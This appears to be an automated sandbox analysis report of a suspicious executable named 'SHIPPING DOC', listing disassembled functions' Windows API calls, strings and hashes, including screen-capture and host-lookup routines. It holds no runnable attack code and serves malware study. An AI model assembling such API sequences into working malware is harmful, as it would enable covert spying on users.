                                                                                                                      • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                      • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu$Sleep
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1196289194-4108050209
                                                                                                                      • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                      • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                      • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                      • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 3300687185-3887548279
                                                                                                                      • Opcode ID: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                                                                                                                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                      • Opcode Fuzzy Hash: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                                                                                                                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                      • API String ID: 1976180769-4113822522
                                                                                                                      • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                      • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 461458858-0
                                                                                                                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                      • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969911579-0
                                                                                                                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 956284711-4108050209
                                                                                                                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 1965227024-3771769585
                                                                                                                      • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                                                                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                      • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                                                                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_memmove_wcslen
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 369157077-1007645807
                                                                                                                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 00445BF8
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                      • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                      • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 3125838495-3381328864
                                                                                                                      • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                      • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                      • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                      • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CharNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1350042424-0
                                                                                                                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                      • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                      • API String ID: 3052893215-2127371420
                                                                                                                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                      • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                      • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                      • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 2295938435-2354261254
                                                                                                                      • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                      • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __swprintf_wcscpy$__i64tow__itow
